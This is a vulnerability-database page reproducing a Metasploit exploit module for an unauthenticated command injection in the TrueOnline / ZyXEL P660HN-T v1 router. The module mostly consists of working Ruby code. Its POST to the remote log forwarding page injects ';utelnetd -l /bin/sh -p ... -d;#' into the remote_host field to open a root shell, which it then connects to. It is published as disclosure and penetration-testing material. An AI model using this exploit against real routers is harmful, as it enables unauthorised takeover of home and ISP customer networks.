Lucene search
+L

TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection

🗓️ 01 Feb 2017 00:00:00Reported by Pedro RibeiroType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 88 Views

TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection vulnerability in remote log forwarding page. Firmware may be distributed in multiple countries

Code
`##  
# This module requires Metasploit: http://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection',  
'Description' => %q{  
TrueOnline is a major ISP in Thailand, and it distributes a customised version of  
the ZyXEL P660HN-T v1 router. This customised version has an unauthenticated command  
injection vulnerability in the remote log forwarding page.  
This module was tested in an emulated environment, as the author doesn't have access to the  
Thai router any more. Any feedback should be sent directly to the module's author, as well as  
to the Metasploit project.  
There are other language strings in the firmware, so it is likely that this firmware is not only  
distributed in Thailand. Other P660HN-T v1 in other countries might be vulnerable too.  
},  
'Author' =>  
[  
'Pedro Ribeiro <[email protected]>' # Vulnerability discovery and Metasploit module  
],  
'License' => MSF_LICENSE,  
'Platform' => 'unix',  
'References' =>  
[  
['URL', 'http://seclists.org/fulldisclosure/2017/Jan/40'],  
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt'],  
['URL', 'https://blogs.securiteam.com/index.php/archives/2910']  
],  
'Targets' =>  
[  
[ 'P660HN-T v1', {}],  
],  
'Privileged' => true,  
'Arch' => ARCH_CMD,  
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },  
'DisclosureDate' => 'Dec 26 2016',  
'DefaultTarget' => 0))  
register_options(  
[  
Opt::RPORT(80),  
OptInt.new('TelnetPort', [true, "Telnet port we're going to use", 9999]),  
], self.class)  
end  
  
def check  
res = send_request_cgi!({  
'uri' => '/cgi-bin/authorize.asp',  
'method' => 'GET'  
})  
if res && res.body =~ /ZyXEL P-660HN-T1A/  
return Exploit::CheckCode::Detected  
else  
return Exploit::CheckCode::Unknown  
end  
end  
  
  
def exploit  
print_status("#{peer} - Attempting to exploit router...")  
send_request_cgi({  
'uri' => '/cgi-bin/ViewLog.asp',  
'method' => 'POST',  
'vars_post' => {  
'remote_submit_Flag' => '1',  
'remote_syslog_Flag' => '1',  
'RemoteSyslogSupported' => '1',  
'remote_host' => ";utelnetd -l /bin/sh -p #{datastore['TelnetPort']} -d;#",  
'remoteSubmit' => 'Save'  
}  
})  
  
sleep 5  
  
begin  
ctx = { 'Msf' => framework, 'MsfExploit' => self }  
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => datastore['TelnetPort'], 'Context' => ctx, 'Timeout' => 10 })  
if not sock.nil?  
print_good("#{peer} - Success, shell incoming!")  
return handler(sock)  
end  
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e  
sock.close if sock  
end  
  
fail_with(Failure::Unknown, "#{peer} - Failed to exploit router.")  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Feb 2017 00:00Current
1Low risk
Vulners AI Score1
88